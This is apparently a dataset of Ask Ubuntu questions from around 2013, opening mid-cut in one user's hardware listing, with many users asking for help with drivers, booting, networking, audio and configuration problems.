1t/1r pcie /0/100/15.2/0.1 generic rt3290 bluetooth /0/100/15.3 bridge sb900 pci to pci bridge ( pcie port 3 ) /0/100/15.3/0 eth0 network rtl8111/8168/8411 pci express gigabit ethernet controller /0/100/16 bus sb7x0/sb8x0/sb9x0 usb ohci0 controller /0/100/16.2 bus sb7x0/sb8x0/sb9x0 usb ehci controller /0/101 bridge family 15h processor function 0 /0/102 bridge family 15h processor function 1 /0/103 bridge family 15h processor function 2 /0/104 bridge family 15h processor function 3 /0/105 bridge family 15h processor function 4 /0/106 bridge family 15h processor function 5 /0/1 scsi0 storage /0/1/0.0.0 /dev/sda disk 1tb wdc wd1002faex-0 /0/1/0.0.0/1 volume 189mib windows fat volume /0/1/0.0.0/2 /dev/sda2 volume 244mib data partition /0/1/0.0.0/3 /dev/sda3 volume 931gib lvm physical volume /0/2 scsi2 storage /0/2/0.0.0 /dev/cdrom disk dvd a dh16acshr /0/3 scsi6 storage /0/3/0.0.0 /dev/sdb disk scsi disk /0/3/0.0.1 /dev/sdc disk scsi disk /0/3/0.0.2 /dev/sdd disk scsi disk /0/3/0.0.3 /dev/sde disk ms/ms-pro /0/3/0.0.3/0 /dev/sde disk /1 power standard efficiency i apologize for my newbness . i hope this is enough info for the hardware . thanks bruno for pointing out i needed to add more info . if i am lacking anything else please let me know and i 'll post it .
363339	shut down netbook by closing lid in ubuntu 13.10	my wife has an acer aspire one ( with the ssd card and an sd expansion card ) . it has never been able to hibernate or suspend , always creating errors and occasionally trashing the data on the sd card , which is the home partition so it 's unfortunate . to get around the problem i have set all exit methods to produce shutdown - she tends to simply shut the lid . i 'm aware the default behavior has for some time been to suspend , but i 've got round that using the gnome tweak tool . however , i 've just installed 13.10 and whilst i have installed the gnome tweak tool and set it to shut down the system appears to be ignoring/bypassing the setting , electing to suspend when the lid is shut . can anyone tell me how to fix it please ? i 'm quite happy to get my hands dirty with the command line .
363340	how do i totally disable all forms of session management in xubuntu ?	xubuntu remembers things like xfce-terminal and chromium whenever my system starts up . i do n't want that function to happen , ever . i want every restart to be fresh . how do i disable this functionality . i 've seen numerous tutorials that unchecking the `` save sessions for future logins '' screen in log off would work , but it does't seem to work for me . when the system comes back the other applications are open . i 've also deleted the files in autostart , as per this question .
363342	lenovo g480 blank screen while booting ubuntu	i love ubuntu very much but i cant install it on my laptop whenever i try to boot it form cd the screen just went blank and dvd spins so fast like its installing to many files but it was some sort of problem.i try it so many times but it did n't worked . please help me thanks in advance shahzad
363346	how to permanently switch caps lock and esc	how can i permanently switch the caps lock and esc key functions in saucy ? i can use this command to do it temporarily ( until reboot ) : /usr/bin/setxkbmap -option `` caps : swapescape '' i tried adding that command as a startup application , but it does n't seem to do anything .
363350	problems with brother printer drivers on 64bit 12.04	i 'm running 12.04 64bit on a toshiba satellite laptop . i have a brotrher mfc-j825dw printer . i 've installed brothers driver for it and the cupswrapper but it wo n't print . i says it is receiving data but it never shows up in the queue . i 've also tried the text only generic driver and the same thing happens . i think some dependencies are missing for the cups wrapper and when i try to find it it says it ca n't be installed . nopt sure if that 's the problem because it does n't explain the generic driver failure . in any case , any ideas ?
363351	ubuntu 12.04 lts can not build a wireless connection	hi i just got a new notebook and it came with ubuntu 12.04 lts operation system . but it ca n't make a wireless connection . i plugged in my ethernet cable and i can reach the internet with it but i need wireless connection so much . this is the first time i 'm using ubuntu so i 'm really confused . i can see wireless networks ( including mine ) but i can not use them . it seems like it 's establishing a connection but soon it gives up . here is the output of the wireless script : http : //pastebin.ubuntu.com/6279692/
363352	user permissions in shared folder	i have a pair of users on an ssh server . lets call them userx & usery . userx has the home dir /home/userx usery has the home dir /home/userx both are members of the userx group . userx has no problems , everything is cool , and working fine . usery may read files in his home directory , but can not write files . how can i give full access permissions ( rwx ) to usery ?
363354	the sound-volume indicator disappeard ubuntu 13.10	i had a problem with sound after i connected a hdmi-cable . i followed the steps here : http : //itsfoss.com/fix-sound-ubuntu-1304-quick-tip/ the sound worked perfect , but the sound-volume indicator disappeared
363355	failing to install ubuntu 13.04	i have a new windows 8 sony vaio svf14a15cxb laptop that has uefi and i have been struggling through an ubuntu installation . i have a bootable ubuntu dvd+r and i have managed to mess with my bios/uefi so that it boots . i have used windows 8 to create a desired hard disk partition and installed ubuntu there , and have burned a boot-repair http : //sourceforge.net/p/boot-repair-cd/home/home/ and refind http : //www.rodsbooks.com/refind/getting.html disk and neither will boot . i know i should continue googling and struggling , but i am getting frustrated . thanks to anyone who gives me the time of day .
363363	error from sudo update-grub	i 've installed ubuntu 13.10 on a lenovo yoga 13 . in order to make the backlight work with the keys i 've been following some instructions of this answer ( link edited ) the process i followed was this : 1 ) sudo gedit /etc/default/grub ( generates errors , i think they are irrelevant - have checked in vim the edit worked ) 2 ) sudo update-grub 3 ) blacklisted the ideapad_laptop by adding `` blacklist ideapad_laptop '' to /etc/modprobe.d/blacklist.conf file step 2 ) generates error : /usr/sbin/grub-mkconfig : 27 : /etc/default/grub : want : not found answers from the comments cat /etc/default/grub does show contents of the file fgrep want /etc/default/grub gives : # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux sudo cat /etc/default/grub also shows contents of the file update the grub error from step 2 occurs whenever i try to install anything . i have previously tried to run the command sudo apt-get install grub-pc - which also generates this error . i 'm worried i 've upset the balance of my computer 's universe ...
363366	building jot for non-photorealistic renders	i am an absolute newbie to building and compiling and so the building instructions for [ jot ] ( https : //github.com/qulogic/jot-lib ) are confusing to me . can anyone figure this out and give me a step by step ? if the link for some reason does n't work then here is what it says on the site : jot-lib c++ libraries for 3d graphics , especially npr what is this ? this is a fork of the jot-lib library developed at brown university , princeton university , and the university of michigan and released on google code . the aim is to get things running on modern compilers , in a 64-bit world , and to remove the cruft of code written long ago . i 'm no expert on the theory , so do n't expect me to go fixing bugs in any of the algorithms any time soon . i am currently targeting linux distributions , but i 'm also aiming to make the code more portable where possible . dependencies you will need a c++ compiler , cmake , and development headers for some external libraries : opengl glut glew libpng coin3d ( optional ; used by iv2sm for conversions . another implementation ofi open inventor may also work . ) how to build first run cmake to check for dependencies and set up compilation flags . then run make to build everything . $ mkdir build $ cmake .. $ make -j $ num_procs
363367	offlineimap stopped working after 13.10 upgrade	since upgrading to ubuntu 13.10 , offlineimap no longer works . the first time i run it , it wants me to manually enter all passwords , despite them being already set-up in the keyring ( it worked fine under 13.04 ) . when i try to run it again , it reports segmentation fault .
363370	which version of ubuntu should i choose for these specs ?	well , i 'm very confused on which version of ubuntu i should download . first off , my specs are : intel core 2 duo @ 2.4ghz 2gb ddr2 ram @ 667mhz 250gb hdd geforce 210 gpu 1gb gddr3 and i 'm looking for a system that will be stable and run smoothly for a while . but i 'm confused on whether i should get ubuntu 13.10 or 12.04 lts . i would enjoy an lts version because well , long term support ... but 13.10 will be supported for 9 months and is supposedly faster . so with the opinions of the community , which version would be best for me ? edit : i forgot to mention , should i get 32-bit or 64-bit ? i 've heard not to get 64-bit if i only have 2gb of ram but the ubuntu site recommends 32-bit if you have less than 2gb .
363371	ubuntu size , and applying it as well as i can	i have a laptop from 08 , which had vista on it . at some point , ( likely 2011ish ) i installed ubuntu onto the laptop , as well as keeping the vista os . regardless , when vista died , i was able to extract vista files via ubuntu . that 's the history of the computer . after a while , i attempted to re-install vista onto the laptop , which just would n't happen . so , i obtained a 32gb thumb-drive , and installed the maximum number of gb downloadable possible of ubuntu on the thumb-drive , to install onto the laptop , as a standalone os . my question , in it 's entirety.. bears my curiosity around whether i have a `` 32gb '' type ubuntu.. or if it expanded on it 's own . in essence , if i can allow ubuntu to work off of my computer , rather than the file size i had allocated on the thumb-drive , in order to get a faster , more responsive experience . as an example , if i had downloaded the 2gb sized ubuntu , and installed it only this computer.. is that end result different from the 30ish gb download ? i 'd like to know if my computer still has `` space '' for more ubuntu . when i had both vista and ubuntu at once , i feel there is n't too much of a difference revolving around my current ubuntu experience , when it stands alone on this laptop . hopefully i clarified my question . i wanted to know if ubuntu expanded , using the computer in it 's entirety.. or if it 's capped based on what was contained with that 30gb ish download size , which i imported onto a thumb-drive to install onto this laptop . thank you for any assistance or knowledge on the matter . it 's greatly appreciated . : )
363375	ethernet drops after a minute 12.04	my wired internet connection has started failing after about a minute . i am working with ubuntu 12.04 . the system has been running strong for more than a year now . this new behavior seems to have been triggered by restarting the computer via ssh with the following command : sudo shutdown -r now when the connection fails it can be restarted by clicking the wired connection 1 in the networking drop down menu . when i do that it says wired network disconnected , then wired connection 1 established . if i run : ifconfig -a i get very similar results regardless if the connection is working or not . the top one is not working the bottom one working a few minutes later . eth0 link encap : ethernet hwaddr 50 : e5:49:39:02:35 inet addr:140.254.233.250 bcast:140.254.235.255 mask:255.255.252.0 inet6 addr : fe80 : :52e5:49ff : fe39:235/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:505915 errors:0 dropped:482 overruns:0 frame:0 tx packets:103243 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:282230050 ( 282.2 mb ) tx bytes:8576325 ( 8.5 mb ) interrupt:43 base address:0x8000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4735 errors:0 dropped:0 overruns:0 frame:0 tx packets:4735 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:365328 ( 365.3 kb ) tx bytes:365328 ( 365.3 kb ) eth0 link encap : ethernet hwaddr 50 : e5:49:39:02:35 inet addr:140.254.233.250 bcast:140.254.235.255 mask:255.255.252.0 inet6 addr : fe80 : :52e5:49ff : fe39:235/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:513759 errors:0 dropped:484 overruns:0 frame:0 tx packets:104100 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:283702441 ( 283.7 mb ) tx bytes:8687253 ( 8.6 mb ) interrupt:43 base address:0x8000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:5223 errors:0 dropped:0 overruns:0 frame:0 tx packets:5223 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:400395 ( 400.3 kb ) tx bytes:400395 ( 400.3 kb ) if i run : sudo lshw -class network i get the following : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 06 serial : 50 : e5:49:39:02:35 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8168 driverversion=8.037.00-napi duplex=full ip=140.254.233.250 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:43 ioport : ee00 ( size=256 ) memory : fbdff000-fbdfffff memory : fbdf8000-fbdfbfff i have found reports of other people having similar symptoms with similar ethernet cards . the top answer from here did not fix the issue . i am at my whits end . i would greatly appreciate any help . i do not know if it matters , but i am using a gigabyte d2h-b3 motherboard . i have been digging more on the internet and have found an interesting command : dmesg | tail -f it produces the following output : [ 17403.353623 ] r8168 : eth0 : link up [ 17403.354627 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 17414.013600 ] eth0 : no ipv6 routers present [ 17527.324897 ] eth0 : no ipv6 routers present [ 17552.098039 ] eth0 : no ipv6 routers present [ 17807.970183 ] r8168 : eth0 : link down [ 17812.424501 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 20651.244488 ] r8168 : eth0 : link up [ 20651.245896 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 20661.560793 ] eth0 : no ipv6 routers present i have no idea what could be causing this , but i feel like we are closer to figuring it out what the root problem is .
363377	how can i run a sudo sh at startup ?	i 'm not sure how this is a duplicate of anything that was mentioned . the script i 'm trying to run needs sudo to work , none of the answers say anything about getting a script that needs `` super user '' privelages to run at startup . none of the answers have worked so far , i think upstart would need my password in it somewhere to run the sh . i 'm trying to run a sudo sh at startup , none of these methods seem to work . i tried adding sudo //usr/local/include/temp_throttle.sh 80 to startup applications . it does n't run or even ask for password . i tried gksudo //usr/local/include/temp_throttle.sh 80 to startup applications . it pops up asking for a password for almost half a second then dissappears but does n't run . i tried making a .desktop file and tested it , it runs it but not in sudo so it does n't work . just tried putting my .sh in /etc/init.d/ and used update-rc.d . it runs the script at startup but without sudo privlages so it does n't work . i 'm not sure what to do to make this work . note , upstart is installed and working but will not launch this script properly .
363379	laptop help on lenovo	can someone please help ... i can not get the iso that is burned as an image to install . i keep getting a bios disabled . it starts to run the scripts then stops saying that . i have a lenovo runing 6gb and intel i5
363380	ubuntu 13.10 bad video quality/coloring ( amd radeon hd 6700 series )	i just recently installed ubuntu 13.10 alongside windows xp . i had problems with the screen resolution but i was able to resolve that problem installing a different version of the gnome shell . now the only problem i have video related that i can think of is the colour . it looks terrible , i have a amd radeon hd 6700 series graphics card and i installed amd catalyst control center earlier today . it did n't seem to fix any problem i had . i am new to the ubuntu os so i know very little aside from some terminal commands ... i also have a screenshot though i 'm not sure that will help with the problem .
363381	does installing ubuntu touch other physical connected hard drives	in my computer i have 2 ssds . one has windows installed . the other is waiting to be used . if i install ubuntu 13.10 on the empty ssd is there any chance that a single bit will be written to the windows ssd without me trying ?
363382	nuvola takes over sound while active ?	i just installed nuvola music player on a just-today reinstallation of ubuntu 13.10 . i was having issues on the previous installation , which was 13.04 , and reinstalled the os . i was having sound issues before , and i 'm having them now as well . basically , sound works as expected when nuvola is closed . when it 's open , sound plays in nuvola , but any other application is silent , until i close nuvola , at which point it works again . it seems to `` take over '' the sound while it 's open . anybody else have experience with this problem , or able to offer tips ? alternately ( i 'm not expecting you to ... i 've googled it pretty extensively ) , do you know of another piece of software that will provide a window for google play music ? relevant info : i 'm just using the onboard sound output on my motherboard . it 's configured as 5.1 , with the appropriate speakers . regardless of whether nuvola is active or not , i get sound out of all speakers as expected .
363384	openstack best resources	i have an idea for a product that would utilize an ubuntu private cloud that would take advantage of both juju and the openstack apis . the problem is , while i know quite a bit about server administration at the bare-bone level , i do n't know much about building and running a cloud . where are some good resources about this -- from setup/configuration to hardware requirements ?
363387	zte mf190s etisalat modem	i 'm unable to use my zte mf190s etisalat on ubuntu 12.04 64bit on hp pavillon g6 . it only shows up as a storage device but is n't detected as a modem . it works on windows .
363388	swap drive not operating correctly	at first , i started seeing the warning signs . the halting pages . the molasses speed of the windows closing . the pictures not rendering . then , i took action . recently i added a swap drive to my computer . for a while , everything was good . unicorns frolicked among the new bits and bytes resplendent on the shiny metal platter known as my swap drive . today , i opened chromium , and got on the 7th tab ( start.csail.mit.edu ) `` he 's dead , jim ! '' . this used to happen before i added my swap drive , but now i thought that it would n't happen because i added more memory . i fear for the safety of the unicorns . please help me make my swap drive work again . as a side note , here is the result of cat /proc/swaps : filename type size used priority /dev/sda5 partition 39075836 213896 -1 result of free : total used free shared buffers cached mem : 507472 330792 176680 0 6208 71252 -/+ buffers/cache : 253332 254140 result of df -h : filesystem size used avail use % mounted on /dev/sdb1 147g 8.9g 130g 7 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 240m 12k 240m 1 % /dev tmpfs 50m 824k 49m 2 % /run none 5.0m 0 5.0m 0 % /run/lock none 248m 208k 248m 1 % /run/shm none 100m 20k 100m 1 % /run/user
363391	make chromium and sites dark	i am trying to make all of the white space on most sites black or dark and the text white . i tried a chrome extension called hacker vision . it did not work . if anyone knows another way it would be greatly appreciated .
363392	are all `` important security updates '' , updates to already installed packages ?	i 'm running 12.04 , and i 've never downloaded any drivers for the installation of any peripheral devices . yet , i noticed a fair few `` important security updates '' involving drivers/utilities for hp devices/software . i understand if the default installation of ubuntu came with a set of drivers for these devices - and the update manager , having noticed that they live on my system , went and found newer versions , but still - given i do n't use any devices - i 'm either forced to download an irrelevant update , sift through the updates to check applicability , or turn off update manager altogether : none of which are desirable . first ; the obvious - can someone confirm that the list of `` important security updates '' on the server that update manager connects to , is not actually populated with every patch ever written ( i.e . for all ubuntu packages regardless of whether they 're installed or not ) ? unlikely , but..
363394	no hdmi audio on msi u270	long time windows user first time ubuntu . tried this no hdmi audio for msi x370 ubuntu 13.10 64bit and it`s not helping . i have the same issue as this guy . also tried this with no results how do i output audio through hdmi ?
363395	how to run `` rise of nations '' with wine ?	i ca n't install `` rise of nations '' expansion pack ( 2 cds ) with wine . i see a message pidgen.dll can not load if you have a solution , could you please explain it very clearly so that i can follow ?
363397	ubuntu software center does n't let me install any software	ordinarily i when i click to select a software package in the ubuntu software center , i see the more info button displayed near of the left edge of the window and the install button displayed near of the right edge of the window . however recently the install button does not appear anymore . what can i do to install software ?
363399	xubuntu 13.10 shuts down without asking when power button pressed	since i upgraded to xubuntu 13.10 , i ca n't seem to make the power button bring up the xfce shutdown dialog . i never had this problem on 13.04 , but even after a clean install it persists . when i use unity , the dialog comes up as expected , so the problem seems to be specific to xubuntu . is anyone else experiencing this ? any tips on how to fix it ?
363401	ca n't enable bluetooth 13.10	i previously installed xubuntu 13.04 on my compaq nx8420 and was able to use bluetooth with no issues . i recently performed a clean install of ubuntu 13.10 ( not xubuntu ) , and now ca n't enable bluetooth . i go to the default bluetooth app , move the slider to 'on ' and it slides straight back to 'off ' . do i need to install any extra packages or use an alternative app to get bluetooth working ? i ca n't think of a reason why it would work in xubuntu 13.04 , but not ubuntu 13.10 .
363403	firefox massive slowdown on upgrade to 13.10	in 13.04 firefox was working just fine , but after the upgrade , every few minutes , firefox locks up and eventually changes to that dreaded `` grayscale window '' for several seconds . the problem appeared immediately after the upgrade . i 'm afraid i do n't know which version i had before the upgrade , but now i am running firefox 24.0 . is this a known bug , or are there any steps i can take to find the root cause ?
363404	ssh-add command does not add my identity to ssh-agent	i just installed ubuntu 13.10 and i was about to add my identity to my ssh-agent so i open up a terminal and did this bjorgvin @ buntu : ~ $ ssh-add -l the agent has no identities . bjorgvin @ buntu : ~ $ ssh-add bjorgvin @ buntu : ~ $ ssh-add -l the agent has no identities . bjorgvin @ buntu : ~ $ any ideas ?
363405	gnome 3 not working properly when working with java after jdk update ?	something extrange is happening to my ubuntu , however i blame this to : oracle jdk 8 early access or netbeans 7.4 i just did the update for both and sometimes when i 'm working with netbeans something weird happens to the graphical thing in a sudden so i can keep seeing open windows , even by pressing ctrl+alt+t i can get a console . however , title bars are n't working for any window , not the alt+tab , not even think about the gnome workspaces thing . i have to reboot the machine then but this have been happening quite often . heard about any issue with oracle messing somehow the gnome enviroment ? how could i `` restart '' it if it happens anytime ?
363408	ubuntu 12.04 , web cam light flashing	have been running ubuntu on my compaq c757 reliably since 9.10 . currently running a fresh install of 12.04 lts . somewhere during my regular updates , my webcam started flashing its power light . light flashes from logon screen all throughout my session . i am not running google chrome but chromium and firefox . webcam works normally whenever i run cheese webcam booth , light comes on solid and webcam works normally . i close out of cheese , webcam shuts off , and then the light starts blinking again . my system is dual boot , when i boot into windows 7 , webcam does not exhibit this problem . i suspect issue may be related to new laptop power management settings in kernel based on research on the web of similar problems , but i do not know how to instruct it to treat webcam differently .
363409	thunderbird can not open `` kontakte '' . how to get rid of that error message ?	in each case shortly after the start of the thunderbird email i read : there was a problem opening the address book `` kontakte '' - the message returned was : can not open book : source already loaded ! what does this mean ? what must i do ? i do not need those contacts !
363411	how do i remove unity after installing kde ? ( 13.10 )	i 've run with unity since 12.10 , but near the end of 13.04 i decided i wanted to try kde . so i installed kubuntu-desktop . since then , i 've upgraded to kubuntu 13.10 . however , when i shut down my computer , right before it goes down , i still see the old unity desktop . on top of that , some things ( like drop box when you open the dropbox folder ) will call upon the file browser used by unity ( i forget what it 's called ) . so basically , i want to know : does this mean unity is still running in the background , slowing me down , and how do i get rid of unity once and for all ? thanks in advance . ( i would n't consider this a duplicate , as it 's a later version of ubuntu than the suggested question )
363416	weird graphical glitch when trying to change install path for steam on ubuntu 13.10	ok so i am trying to change my installation directory for steam because ubuntu is installed on my ssd and i have another terabyte hd . everytime i try to change my installation path i get this weird graphical glitch .
363418	if i upgrade ubuntu 13.04 to 13.10 will i have to reinstall all of my software ?	i 'm running ubuntu 13.04 right now . if i upgrade to ubuntu 13.10 will i have to reinstall all of my currently installed software ? like gimp , dropbox , recordmydesktop , etc .
363419	reinstalling 13.10	so i was super hyped when i saw 13.10 came out . i immediately updated , and upon restart something did n't seem quite right . most of the system default icons , ( trash , settings , etc.. ) have no image . the bar at the top with the time and date and other settings like logging out , also are missing . i am missing all sound . i can not open software and updates under system settings , and i get an error when attempting to do so . is there anyway i can attempt to re install 13.10 to fix this issue . thanks in advance .
363420	e : error : opening the cache ... . i/o error , dev sda , sector 71235640	i 'm trying to run apt-update , but every time i run it and comes to end , it always has an error to the end saying reading package lists ... error ! e : unable to parse package file ... i have tried running the following commands sudo rm -rf /var/lib/apt/lists sudo mkdir /var/lib/apt/lists sudo apt-get clean and after running this command again , the same message i still get . sudo apt-get update i decided to try it ove tty ( f2 ) this is the message i get http : //awesomescreenshot.com/0721uxk36c http : //awesomescreenshot.com/0051uxk756 from the line i/o error thing.. is it telling me that the drive is getting bad ? i 'm running ubuntu 13.04 in dell d520 i 've tried running the disk utility smart test , and all assessment seems to be okay . only one attribute is failing which is the airflow temperature | 60c/140f . with my issues above , is there anyway around to fix it ? can i still go on using my laptop . cause i 'm still far from getting a new laptop if the case is to be worst .
363422	removing windows 7 from dual boot , what would be the best method out of the following options	was wondering how i should remove windows , using gparted or reinstalling ubuntu as a single os ? i have downloaded very little in ubuntu , so re-installing it would n't be a problem . would this be a suitbale option ? or is using gparted , then deleting grub a more suitbale option ? thanks .
363423	ubuntu server install leads to blackscreen	i am attempting to install ubuntu server on a dell xps 420 that has no os and is wiped clean.i have burned a disk for the server to boot from and it brings me to the installation window after selecting the language and hitting install 1 of 2 things occur . 1. the server reboots and takes me back to language select . 2 . i get a black screen aside from a flashing underscore in the upper left hand corner like it is waiting for my input , but is unresponsive . how can i get the os installed ?
363426	what could have caused a corrupted partition ?	i installed ubuntu ( xubuntu to be precise ) , about a week later windows 7 had trouble writing to one of my partitions . i ran chkdsk /f from windows and everything worked again . about five days later i try to mount the same partition and ubuntu says it is corrupted . windows show only bootsqm.dat . everything i lost is backed up , so i do n't really care about any recovery and i could reformat the partition and restore easy enough , but then i would n't have learned anything : ) if there are logs on windows/ubuntu that i could look through to make sure this does n't happen again that would be awesome . my system setup : ms-dos partition table with two primary partitions and an extended partition . the one i have been having problems with is `` cloud '' windows - primary xubuntu - primary storage - logical on extended cloud - ntfs logical on extended ( where i keep my google drive folder ) note : no swap thanks
363427	windows 8 and ubuntu 13.10 dual boot ?	is it possible to dual boot windows 8 and ubuntu 13.10 ? if so , how ? if not , is it possible to do it for ubuntu 13.04 ?
363428	manually changing power script to never shut off monitor	after a recent update my ubuntu 12.04 lts now powers off the monitor after 10 minutes of idle time . the power setting are set to `` never '' shut down . this update was sent out today also mess other things up as well , but i 'm more concerned with this one right now . it is obvious to me the update changed my configuration file and the gui is no longer writing to it . basic question : where can i find the actual configuration file , and how do i manually set it to `` never '' turn off ? i will be marking the config file as `` read only '' afterward to prevent it from being overwritten again in the future , by another update or installation . it is probably more annoying for me because i have two pcs on the same monitor on different inputs . when it powers it off , it reverts to the other one . so , moving the mouse does n't bring it back up , i have to switch the input back on the monitor .
363430	trying to install postgresql : i386 on 12.04 amd64	due to some legacy 32 bit libraries being used in postgresql functions i need to get a 32 bit install of postgresql on a 64 bit native system . but it seems like there is a problem with the multiarch not seeing all.debs as satisfying dependencies . uname -a : 3.8.0-29-generic # 42-precise-ubuntu smp x86_64 dpkg -- print-architecture : amd64 dpkg -- print-foreign-architecture : i386 apt-get install postgresql-9.1 : returns postgresql : depends : postgresql-9.1 but it is nto going to be installed postgresql-9.1 : i386 : depends : postgresql-common : i386 but it is not installable depends : ssl-cert : i386 but it is not installable depends : locales : i386 but it is not installable etc .. but i have installed ssl-cert_1.0.28ubuntu0.1_all.deb and locales_ ... _all.deb andpostgresql-common is an all.deb does anyone have experience installing 32 bit packages on 64 bit systems that depend on packages that are all.debs . or has anyone installed 32 bit postgres on 64 bit ? any help appreciated .
363442	install microsoft office pro 2010 on ubuntu 13.04	i am trying to install microsoft office pro 2010 on ubuntu 13.04 using wine . i have read several threads and everybody seems to be able to do this but me . so i am giving a shoutout for help . i tried the process taking screenshots of each step . i would post them but evidently i 'm not popular enough to be allowed the luxuary of sharing my woes with my fellow ubuntu-ers . any suggestions on how to get office up and running would be greatly appreciated . thanks ! here are the steps that i took ( without screenshots ) : downloaded the installer . right click and click run with wine windows program loader unpacking the files entered the product key , it was validated , and clicked continue accept the licensing agreement , and click continue click install now waiting ... and boom , the error . it just says that the installer has encountered an error . it gives the same result every time . again , any help is greatly appreciated . thanks !
363443	ubuntu ca n't boot after upgrade from 13.04 to 13.10 without inserting a random remote disk/harddrive	the problem is so weird . i upgraded my laptop from 13.04 to 13.10 . the upgrade went smoothly and i restarted the machine as required when the upgrade finished . after the restart , the grub menu was still shown as usual but nothing showed up after i select ubuntu as i used to . the ubuntu was not booted and the harddisk led was not blinking neither . only a blank screen was shown forever . however , after i plug in any remote storage disk/harddrive into the laptop and start it , ubuntu runs . as far as i see , the only difference is in the bios boots option , there is one more entry for booting from usb with a usb disk inserted ... the problem is still there whenever i start it without a usb disk inserted ... the machine is dual-booted with windows 8 and the windows os works fine after upgrade ...
363444	how to check if repo 's in sources.list.d support particular ubuntu version	so new release of ubuntu is just out and before jumping to upgrade bandwagon , you want to check if the repo sources ( in /etc/apt/sources.list.d ) of your favorite apps have added support for the said ubuntu release
363448	how can i debug vnc screen repainting issues ?	i have what some might consider a trivial use for vnc , but i 'd like to get it to work and it 's technically interesting to me . my use case is that i 'd like sometimes to be able to control my desktop from my living room while watching tv . the desktop runs ubuntu , currently 12.04 , but that may change soon . i 'm using the default vino server . i 'd like to control it from my ipad and i have a nicely performing wifi . i got the well-regarded ( if reviews can be believed ) app vnc viewer for the ipad . it 's not working as well as i 'd hoped . the problem is the speed of repainting . it 's abysmally slow . i can click a close button , walk over to the desktop and see that the window has closed , but on the ipad , the vnc client wo n't show the close for minutes if ever . i 've noticed that closing windows takes a lot longer to update than to open them . so the question is is this primarily client or server-caused ? and if server-caused what can be done about it ? is vino the best client or is something else better ?
363449	partition question	when i 'm looking at my disk utility , i have 3 partitions : filesystem | partition 1 | 99 mb fat filesystem | partition 2 | 636 gb ext4 swap | partition 3 | 3.7 gb swap what are the three for ? can i delete any of these ? christopher @ christopher-ubuntu : ~ $ sudo blkid [ sudo ] password for christopher : /dev/sda1 : uuid= '' b566-a28c '' type= '' vfat '' /dev/sda2 : uuid= '' efea80ee-715a-44de-9c74-57b38fc9b25c '' type= '' ext4 '' /dev/sda3 : uuid= '' 7b763a32-e4c4-48a1-9ced-1b87ef3d80fd '' type= '' swap '' christopher @ christopher-ubuntu : ~ $ fdisk -l christopher @ christopher-ubuntu : ~ $ sudo free total used free shared buffers cached mem : 3436848 1256972 2179876 0 65776 577704 -/+ buffers/cache : 613492 2823356 swap : 3639292 0 3639292 christopher @ christopher-ubuntu : ~ $ df -h filesystem size used avail use % mounted on /dev/sda2 584g 6.5g 548g 2 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.7g 8.0k 1.7g 1 % /dev tmpfs 336m 1.2m 335m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.7g 288k 1.7g 1 % /run/shm none 100m 40k 100m 1 % /run/user /dev/sda1 93m 2.2m 91m 3 % /boot/efi sudo fdiks -l : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x16a83e64 device boot start end blocks id system /dev/sda1 1 1250263727 625131863+ ee gpt partition 1 does not start on physical sector boundary .
363452	how to move a window if titlebar is overlapped by ubuntu menu	somehow the title-bar of chrome was overlapped by ubuntu menu-bar like attached image . in this case how to move this chrome window ?
363454	force lower quality flash	flash works fine in my old 1/2 gb ram toshiba satelite . though , to have it play faster ( or in sync with music or timing ) , i need to lower the quality . flash games these days have removed this ability ( probably so people ca n't abuse bugs or something , i do n't know ) . is there still a way to get through this ? the game i 'm playing is kabam 's `` dragons of atlantis '' . the game works well as it is , but it sometimes takes minutes for transitions to the next page to finish .
363455	unique suspend issue with ubuntu 13.10	i have a little bit of a unique issue with suspend . my laptop suspends and resumes properly , but the built-in laptop screen does not turn back on when resuming for some strange reason . i have to do a hard reset to make the laptop screen wake back up . this problem for me is longstanding , and started with ubuntu 12.04 lts ( i now run ubuntu 13.10 ) and never got fixed since ( i 'm thinking it is a bug that never got fixed all this time ) . it is an issue i believe with the graphics drivers ( stock x.org drivers shipped with ubuntu ) . here is another strange thing , when i have a external monitor plugged in ( vga or hdmi ) , and resume it from suspend ( assuming it was already in suspend ) , the laptop screen still does n't turn on , but the external monitor , regardless of connection , turns on normally . my graphics card is a amd radeon hd 6620g , that is integrated on my amd a8-3500m apu cpu .
363457	ubuntu 13.10 no audio	all of my audio has worked fine beforehand , i have tried 'sudo rm ~/.pulse* ~/.config/pulse* ~/.asoundrc -r ' , with no results and i 've checked alsamixer to see if the correct audiocard was selected . from what i can tell nothing is muted .
